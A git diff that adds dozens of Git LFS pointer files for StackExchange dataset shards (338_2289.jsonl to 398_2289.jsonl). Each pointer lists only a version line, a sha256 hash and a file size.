file mode 100644 index 0000000000000000000000000000000000000000..cf3e1d0026850478da66a409a1cb75791933788a --- /dev/null +++ b/data/stackexchange/1-1/338_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9129ea1cfd93a2789ef031b9765c9be1eb342a477962e6deeb7c7da1f37d05a +size 38472607 diff --git a/data/stackexchange/1-1/339_2289.jsonl b/data/stackexchange/1-1/339_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c521193edda30a71ef79a0d0b69f6f5b70593b0 --- /dev/null +++ b/data/stackexchange/1-1/339_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b0131fd3b717154eca42497efd1ca1a9629544b62856de865a1e6d14f55ca6d +size 38549176 diff --git a/data/stackexchange/1-1/33_2289.jsonl b/data/stackexchange/1-1/33_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..3010398cc7fa3e42750e98f2569d4fce5ab73208 --- /dev/null +++ b/data/stackexchange/1-1/33_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:db7c0b4f9b56ae9d921353b9a0ebf62d884678f63389cb98989c0b658a7861d5 +size 35931277 diff --git a/data/stackexchange/1-1/340_2289.jsonl b/data/stackexchange/1-1/340_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6961373bc62ee58fddc5911703e9682033eb738b --- /dev/null +++ b/data/stackexchange/1-1/340_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c593e9d37bfa1e0af8f28657779bc147159b80c825a8a12c1b2ad42dc13e920 +size 38756097 diff --git a/data/stackexchange/1-1/341_2289.jsonl b/data/stackexchange/1-1/341_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..65deec242f738e1f8477d18186bbeecc87673adc --- /dev/null +++ b/data/stackexchange/1-1/341_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0be6192db483d35962374cb5b8afb66056e6430fcc6066a3d2bac4de73afa3e9 +size 37963296 diff --git a/data/stackexchange/1-1/342_2289.jsonl b/data/stackexchange/1-1/342_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c08652f5973e4d69a12efb759cc432bd0ea41d0b --- /dev/null +++ b/data/stackexchange/1-1/342_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6572bc1a9bb5f4b8e8f4b117d391e44d018ab55333e34db94258ae70a502b250 +size 38414278 diff --git a/data/stackexchange/1-1/343_2289.jsonl b/data/stackexchange/1-1/343_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8ce235ae10ab4abf5c1e0f78af9ea504a9a38c2f --- /dev/null +++ b/data/stackexchange/1-1/343_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbc91b8b964e699589d6579fc72c6f7b3cee15436994d63d4bba2af614262498 +size 38689087 diff --git a/data/stackexchange/1-1/344_2289.jsonl b/data/stackexchange/1-1/344_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd872c36497e61e4559b0191d4900e8cd4471459 --- /dev/null +++ b/data/stackexchange/1-1/344_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7da6e2fc4cffe7e8da919536036615e11e5824099e4672ae705a0c390fdcdb8a +size 38758603 diff --git a/data/stackexchange/1-1/345_2289.jsonl b/data/stackexchange/1-1/345_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c89a9314fa8e88711294d9eabeaa21d855378756 --- /dev/null +++ b/data/stackexchange/1-1/345_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:896b451d5b9498c1adf26902ae277f1117e5b9c85db66ef4b7d23445b728542f +size 39052430 diff --git a/data/stackexchange/1-1/346_2289.jsonl b/data/stackexchange/1-1/346_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f1cf04603dcfc35e5afe6f5e7d2e7c902f63941f --- /dev/null +++ b/data/stackexchange/1-1/346_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d5680132fa87a8c2885ba2f561764332ba387ec0896d05e26192a6c43a3fbef5 +size 38336572 diff --git a/data/stackexchange/1-1/347_2289.jsonl b/data/stackexchange/1-1/347_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0816112fc3b2b1881baa75a45bbc60096926b899 --- /dev/null +++ b/data/stackexchange/1-1/347_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:67e4def2653ba086b4be11913283a48415087af971d2bb1b6ea612e62565bf82 +size 38945548 diff --git a/data/stackexchange/1-1/348_2289.jsonl b/data/stackexchange/1-1/348_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ef84036ce966625318736c6fb2d3e518bd210638 --- /dev/null +++ b/data/stackexchange/1-1/348_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d215d40b894edbc1c1cb7efb0a81d65d598c26070a35808fcecf0e30fc36f95 +size 39050796 diff --git a/data/stackexchange/1-1/349_2289.jsonl b/data/stackexchange/1-1/349_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ab5ef197ead673f2039f708064f7aea369d4868 --- /dev/null +++ b/data/stackexchange/1-1/349_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea08b031d5f389ffd9528d384a0ab58d43c3020ead9e1d447ef4afdae6cf1dd6 +size 39096933 diff --git a/data/stackexchange/1-1/34_2289.jsonl b/data/stackexchange/1-1/34_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2053f163810cdb6a4ca029ce420215f83d232365 --- /dev/null +++ b/data/stackexchange/1-1/34_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0d03c82d82979d7eb768f87b03d9be50908855bcc7319166809894fa2623dac +size 35844720 diff --git a/data/stackexchange/1-1/350_2289.jsonl b/data/stackexchange/1-1/350_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d921e60b5441b3b8d5869f17a7f1138e60ab3e69 --- /dev/null +++ b/data/stackexchange/1-1/350_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5cf0884c6366a9282b84512d700766e78f43b3798831a8f6cdeaed8642c756e +size 37043802 diff --git a/data/stackexchange/1-1/351_2289.jsonl b/data/stackexchange/1-1/351_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..84d66d21f88ceb57a1217b840f7e22241e73d5c7 --- /dev/null +++ b/data/stackexchange/1-1/351_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1da0226b91f0435bcfafbf8232a59e7fe570d55ca56c9eea450d9d93af8cb7c9 +size 36454604 diff --git a/data/stackexchange/1-1/352_2289.jsonl b/data/stackexchange/1-1/352_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3eb4639c0ad04386aa1c45e6f6968800cb4b8c3e --- /dev/null +++ b/data/stackexchange/1-1/352_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b4a07ebef8bcd51ef3b8fb023730f761f1b3fe92c471baea8a0fd90a9858982 +size 36678340 diff --git a/data/stackexchange/1-1/353_2289.jsonl b/data/stackexchange/1-1/353_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a33cf2b3636b9baf5aa951d8acc63c27d49c1457 --- /dev/null +++ b/data/stackexchange/1-1/353_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2361ddca9ba7801aeec69d262ced708dcd85f13b7f6dfaa8bbdaea254a54b790 +size 35889834 diff --git a/data/stackexchange/1-1/354_2289.jsonl b/data/stackexchange/1-1/354_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..81e7caa8dd9bc32f5c49ca668c6268e6b109b16e --- /dev/null +++ b/data/stackexchange/1-1/354_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6ee50ea1dc9526035c834cf22dcf34562c52e820a9674fd0e9cbf13259379a1 +size 36158417 diff --git a/data/stackexchange/1-1/355_2289.jsonl b/data/stackexchange/1-1/355_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..6f437ea693a86fa8fcda9667aa21d3067cb17b4e --- /dev/null +++ b/data/stackexchange/1-1/355_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:15abfb22bb39f401f4babeee17cc0bfd4d61757c17eff5be374f22dbecb62624 +size 37493210 diff --git a/data/stackexchange/1-1/356_2289.jsonl b/data/stackexchange/1-1/356_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..50fe998249d347229b1ffa25d113ebda6e516bdc --- /dev/null +++ b/data/stackexchange/1-1/356_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9f53cfb7b0c32ba7270a31685e9abc8a68ffbd6cde26a448e9a8e57aefd6b69 +size 36405435 diff --git a/data/stackexchange/1-1/357_2289.jsonl b/data/stackexchange/1-1/357_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02142bfe3e4067348d88bfc118963082217a4983 --- /dev/null +++ b/data/stackexchange/1-1/357_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf8fdfa9ea3ce23183466a5d7863e2a8d617b418f5328223aae659cfbb2ae95f +size 36414529 diff --git a/data/stackexchange/1-1/358_2289.jsonl b/data/stackexchange/1-1/358_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4aeeaf738b4b1a7201eb9e27f93508fa923793e6 --- /dev/null +++ b/data/stackexchange/1-1/358_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d5019f2b7550bffbef172534ad033e808d46f1712f2255c1b5d94b41e2ac7bf0 +size 36258480 diff --git a/data/stackexchange/1-1/359_2289.jsonl b/data/stackexchange/1-1/359_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..35f4751d80434c85a2fe0093c972e2175a9e9c6f --- /dev/null +++ b/data/stackexchange/1-1/359_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:879916c04fff4d28af780a8997275bcaba59a34c8d5337e12210609267746ef8 +size 36037392 diff --git a/data/stackexchange/1-1/35_2289.jsonl b/data/stackexchange/1-1/35_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d48507d3d5ef711dcf8f553172ba7d567f9f5d81 --- /dev/null +++ b/data/stackexchange/1-1/35_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b66928f30707b0048812bbb55f184f8155214e17ef86d1f030f88e179a0f256d +size 35491728 diff --git a/data/stackexchange/1-1/360_2289.jsonl b/data/stackexchange/1-1/360_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ae9fc5df780dbb2defd74f5ef1a870bb8faa38d --- /dev/null +++ b/data/stackexchange/1-1/360_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51358972e056e1469b98d31e71963f92cbc2cd4f1bda381855e040d9d2c83c0f +size 36266544 diff --git a/data/stackexchange/1-1/361_2289.jsonl b/data/stackexchange/1-1/361_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..236689166ee47e786e71e26e1735435dd5c592ca --- /dev/null +++ b/data/stackexchange/1-1/361_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d597a64350eba3586f916c952b9b9ddf07ccfa2197601c902bad099577a67ce8 +size 36578216 diff --git a/data/stackexchange/1-1/362_2289.jsonl b/data/stackexchange/1-1/362_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21a636f9b38bea004f926fff528cfe212158f438 --- /dev/null +++ b/data/stackexchange/1-1/362_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:ee0a0f0232493b72d1c8127d14326eba3709edcbce096cc4f79f569108db48a5 +size 35598083 diff --git a/data/stackexchange/1-1/363_2289.jsonl b/data/stackexchange/1-1/363_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4362e0e87a7a6640bfd9477875ab867e67e54cef --- /dev/null +++ b/data/stackexchange/1-1/363_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1ebf38a1a629d37c99bcf0d59b0036bc5912b23ef976f5587ddbf48c0ce7259 +size 37027637 diff --git a/data/stackexchange/1-1/364_2289.jsonl b/data/stackexchange/1-1/364_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1f83d5292b13eeee727fb3d8202f0bb422fb5501 --- /dev/null +++ b/data/stackexchange/1-1/364_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:942aeac75a77c016cfb255a08389e0fd6de1249196290631023304282f0ff02d +size 36613275 diff --git a/data/stackexchange/1-1/365_2289.jsonl b/data/stackexchange/1-1/365_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..867f1eeb9352cc588e91d54be7ddbde9591543f1 --- /dev/null +++ b/data/stackexchange/1-1/365_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a02bac0ee04ff45ff17ebf239899e3fda33e1eebf80a980dff614728e72f288 +size 35991988 diff --git a/data/stackexchange/1-1/366_2289.jsonl b/data/stackexchange/1-1/366_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d85c94a6ebaa715acbcb63646f48b1fb82e3d94b --- /dev/null +++ b/data/stackexchange/1-1/366_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12d7a6cf885b37aa08fd9422a2578151253fbf806f44ad9a63bd5f44467d0cb5 +size 36031242 diff --git a/data/stackexchange/1-1/367_2289.jsonl b/data/stackexchange/1-1/367_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5a66ae812e62be4e50e53e0b7d360fb8726b02c8 --- /dev/null +++ b/data/stackexchange/1-1/367_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:529db3d52b77a00acc63c2f7961a9d3c91724aa641e4e975c5b92fa01c567924 +size 37148769 diff --git a/data/stackexchange/1-1/368_2289.jsonl b/data/stackexchange/1-1/368_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5f9f8944afd262d6b535526c815aac699701586f --- /dev/null +++ b/data/stackexchange/1-1/368_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6cef89f3f4a2f7057bebd2476f588fd89ed4d2938e692c0d2fc6aa7982f4bc92 +size 36879929 diff --git a/data/stackexchange/1-1/369_2289.jsonl b/data/stackexchange/1-1/369_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4671685a9a8e88ed91a2477800be4202b1b0febe --- /dev/null +++ b/data/stackexchange/1-1/369_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ae36592da7bcfc97f6be156e7bf1b0b84e8bdd80ef8159da3a74ba9ce03c509e +size 36262100 diff --git a/data/stackexchange/1-1/36_2289.jsonl b/data/stackexchange/1-1/36_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e8428190a4a7752ac9040e65fa40c5cfef23586 --- /dev/null +++ b/data/stackexchange/1-1/36_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:accb54a1c05b4ed1b7d96932eba448fe26603ff9a5a460d64ffe302e3197985d +size 36381761 diff --git a/data/stackexchange/1-1/370_2289.jsonl b/data/stackexchange/1-1/370_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..3c9fda2086c927cd75a7722c1590593ec811e34b --- /dev/null +++ b/data/stackexchange/1-1/370_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8975110092f6eb813c3f8fe282c1e1b6ac2878b59d558bf1dc16139261c1006d +size 35322517 diff --git a/data/stackexchange/1-1/371_2289.jsonl b/data/stackexchange/1-1/371_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a56782fd31428af10be2972305ed19b7f0248879 --- /dev/null +++ b/data/stackexchange/1-1/371_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b523e85a7a2c848aeb2e647addfb8b6084021dc4a659a438b4e0ba33087bebcf +size 36055659 diff --git a/data/stackexchange/1-1/372_2289.jsonl b/data/stackexchange/1-1/372_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..224eb303e308eae04780ae195141c83070ffa2a2 --- /dev/null +++ b/data/stackexchange/1-1/372_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f5eba6458dd96bfb9dda5047d195b92467e2fcda2aa57a44e5269924aa0cdcc +size 35831298 diff --git a/data/stackexchange/1-1/373_2289.jsonl b/data/stackexchange/1-1/373_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2004722eedab96812aeb9bd4951af0ca5c77a96b --- /dev/null +++ b/data/stackexchange/1-1/373_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:db4c9f51df5bc0d1f78724884d17f43538eb38017e645f867a1f128a7af346df +size 36207653 diff --git a/data/stackexchange/1-1/374_2289.jsonl b/data/stackexchange/1-1/374_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d684ef170f66324c8d1f4e358ad83c2b11a2e97a --- /dev/null +++ b/data/stackexchange/1-1/374_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7b1ff27accca33ba77e563976ec06440a04c2a5eec63e47e0079fc244c2f7c6e +size 36067317 diff --git a/data/stackexchange/1-1/375_2289.jsonl b/data/stackexchange/1-1/375_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eb2634047456585823a2a77ed57b5ddfea4354b2 --- /dev/null +++ b/data/stackexchange/1-1/375_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe93924b902119183a8f9b0805a003e56a0f4ddd834cb073a406df4863650064 +size 36578304 diff --git a/data/stackexchange/1-1/376_2289.jsonl b/data/stackexchange/1-1/376_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c42ca649944f0c9954bfa9cac8ad7a1190fc88be --- /dev/null +++ b/data/stackexchange/1-1/376_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:55415bb7f6625af864d9b4933136785b5a2d53e83655449a4b3fb933f282718f +size 36140234 diff --git a/data/stackexchange/1-1/377_2289.jsonl b/data/stackexchange/1-1/377_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d59383730bd66ae5105efdaaad93bfea366ed84a --- /dev/null +++ b/data/stackexchange/1-1/377_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df8e1e00d69d99ddd072da0ace9b1c30295fc1900f3b43d7bc25870170f49feb +size 35632415 diff --git a/data/stackexchange/1-1/378_2289.jsonl b/data/stackexchange/1-1/378_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..801c415b82afe29349fae0654f06e95e527515d9 --- /dev/null +++ b/data/stackexchange/1-1/378_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:d476494a09f40dd39b70576d76c248b149b124a0debb1ceda962338899927cd2 +size 36183389 diff --git a/data/stackexchange/1-1/379_2289.jsonl b/data/stackexchange/1-1/379_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8f7424a25a54bb3b71323f02f975f806c5b8282a --- /dev/null +++ b/data/stackexchange/1-1/379_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:69001d1b04f32de4a68a50a9bb27777b1c43c5aa5a4b0b0871cf5419d5cf832f +size 36719654 diff --git a/data/stackexchange/1-1/37_2289.jsonl b/data/stackexchange/1-1/37_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..71eb3ebb381f6571673bf4cd2d03a7032313c39f --- /dev/null +++ b/data/stackexchange/1-1/37_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd8c987fbf8f2751613229d59ff81a10fb7b552ead2603560929e853ce65ef30 +size 36442669 diff --git a/data/stackexchange/1-1/380_2289.jsonl b/data/stackexchange/1-1/380_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e8a2f161da0b29465342761197a801acf3b4bb0 --- /dev/null +++ b/data/stackexchange/1-1/380_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bac2ea3c5a1e316b199adb432f9a337697efc8fee8f6c2aaaf3df89f1c48b77e +size 35571247 diff --git a/data/stackexchange/1-1/381_2289.jsonl b/data/stackexchange/1-1/381_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..de3b05b8cce79890b0f91377a531570fca191063 --- /dev/null +++ b/data/stackexchange/1-1/381_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7d1434df7a46304ca7c8b7e5ce45c171fa19576dffe22170c6c9de704ccf7564 +size 35997131 diff --git a/data/stackexchange/1-1/382_2289.jsonl b/data/stackexchange/1-1/382_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a20f296a88aedd2597210c96a6dc3012b1753db --- /dev/null +++ b/data/stackexchange/1-1/382_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee3ba7852936b3e5d98ef9b83b8df9b19d1bdc0d8ed429850ff14cd08e5fda37 +size 36902823 diff --git a/data/stackexchange/1-1/383_2289.jsonl b/data/stackexchange/1-1/383_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7d649518ef23fc3db7a397883bd22c4fc3bd5810 --- /dev/null +++ b/data/stackexchange/1-1/383_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c326f7aef92057a5858549363551bb13ec0c1d3d94a74adc2fe37ff28000230 +size 35728963 diff --git a/data/stackexchange/1-1/384_2289.jsonl b/data/stackexchange/1-1/384_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b7ea38bed7c668f9e02e973a3cdab2d67a676513 --- /dev/null +++ b/data/stackexchange/1-1/384_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0438f0d390714640d31291effb060b1749f267d38fc1d2c9d91f590606a2767d +size 37107329 diff --git a/data/stackexchange/1-1/385_2289.jsonl b/data/stackexchange/1-1/385_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a8761ede3833f8c1cf8de36c8b04f2c2c669e66 --- /dev/null +++ b/data/stackexchange/1-1/385_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f895500db04e1ea535bb1b7be2c411f51ff098f049acaee7c12793facd93f702 +size 37095626 diff --git a/data/stackexchange/1-1/386_2289.jsonl b/data/stackexchange/1-1/386_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..eaf870ae502c0414893973e0396a788dd0eefc35 --- /dev/null +++ b/data/stackexchange/1-1/386_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a22a60fa71985ef70c289ae6f36a3e4dec8c91e1169013ee2292e5cdd5f2a585 +size 35698845 diff --git a/data/stackexchange/1-1/387_2289.jsonl b/data/stackexchange/1-1/387_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e022deb9e784d48871915d04ed87ddd6dcfbe017 --- /dev/null +++ b/data/stackexchange/1-1/387_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3eb696daf9699d4f5a578667f2d10ae90ef96ebc6c9c2633f8771197af81bc50 +size 36319661 diff --git a/data/stackexchange/1-1/388_2289.jsonl b/data/stackexchange/1-1/388_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5dd3b2936b9c9b913cb780d0e82efe0ab6b0deef --- /dev/null +++ b/data/stackexchange/1-1/388_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4ad9571be12890745204828bd9bd3ea4bd06ef7859932e32164b251070bbff6a +size 36591726 diff --git a/data/stackexchange/1-1/389_2289.jsonl b/data/stackexchange/1-1/389_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c85aae63af4fd1c07598b2d8ae28bf4a2ce9584a --- /dev/null +++ b/data/stackexchange/1-1/389_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46243dc00e43fd8ac02908c22d765b32804308c4d1630e9938aef3943a800df5 +size 35785540 diff --git a/data/stackexchange/1-1/38_2289.jsonl b/data/stackexchange/1-1/38_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6b860ddf38e4c090ff56bb3c8246f6ff921231a4 --- /dev/null +++ b/data/stackexchange/1-1/38_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:519a2581caac8e0800e5cdd3306b44a12d5ff657f2a71b3b4885390fb7b7b365 +size 35346130 diff --git a/data/stackexchange/1-1/390_2289.jsonl b/data/stackexchange/1-1/390_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f60a8ab5f49b88bdc47c38d6f1ecd41b88fbb21 --- /dev/null +++ b/data/stackexchange/1-1/390_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:58eb7c156d80bdefba3db2337f55574c96f276a9084ae0e10766e2fb141cbf2b +size 36392772 diff --git a/data/stackexchange/1-1/391_2289.jsonl b/data/stackexchange/1-1/391_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2a9cfe0c55aa4d68c96ace6c105161a579b1497f --- /dev/null +++ b/data/stackexchange/1-1/391_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79a8eccb9d3009286c0897a6c496e4fdccf179f656e2f60fdf66342812ad7c24 +size 35141313 diff --git a/data/stackexchange/1-1/392_2289.jsonl b/data/stackexchange/1-1/392_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b801cbf1ab463e1b725366bfc8ff8affda0b4e5 --- /dev/null +++ b/data/stackexchange/1-1/392_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1b8f7f5e2d76e3c4b992da9d842583b4099d930f954e2696a6fe78076f463b5 +size 35951523 diff --git a/data/stackexchange/1-1/393_2289.jsonl b/data/stackexchange/1-1/393_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..04c9c1648664d32423762427c1ef824d60fcd597 --- /dev/null +++ b/data/stackexchange/1-1/393_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:e6c45b9b3f81db79853f5122091f94dfc34f65d0da47655f03b8e4efa8087818 +size 36258025 diff --git a/data/stackexchange/1-1/394_2289.jsonl b/data/stackexchange/1-1/394_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..05f48a26e96e5eb308094e82ca1d93a7c6933bc5 --- /dev/null +++ b/data/stackexchange/1-1/394_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:029050c65dc2745a86cd0064d63563a88808b82fe3b8bea433deb842028bff7c +size 35527415 diff --git a/data/stackexchange/1-1/395_2289.jsonl b/data/stackexchange/1-1/395_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd192a92a020d94f084384d4d987769245677942 --- /dev/null +++ b/data/stackexchange/1-1/395_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ba9f9a601fc35735ab724046dd84cdc96dc81603156ef4a80475ea959d713c0 +size 36553321 diff --git a/data/stackexchange/1-1/396_2289.jsonl b/data/stackexchange/1-1/396_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..28f7e75ab780370339716f0e522c80b59a09de2a --- /dev/null +++ b/data/stackexchange/1-1/396_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9af74f87d1920c96540d8d161d416c2f49eaa20275946f3b617946beb659f54 +size 37448637 diff --git a/data/stackexchange/1-1/397_2289.jsonl b/data/stackexchange/1-1/397_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95d4166efee70248fd106100cf1e71a08d7eab67 --- /dev/null +++ b/data/stackexchange/1-1/397_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19e904909f5cf06cf305bba8d8b42292cb80ddb4c9fc7977bbbf8cec70f98f91 +size 37616170 diff --git a/data/stackexchange/1-1/398_2289.jsonl b/data/stackexchange/1-1/398_2289.jsonl new file mode 100644 index 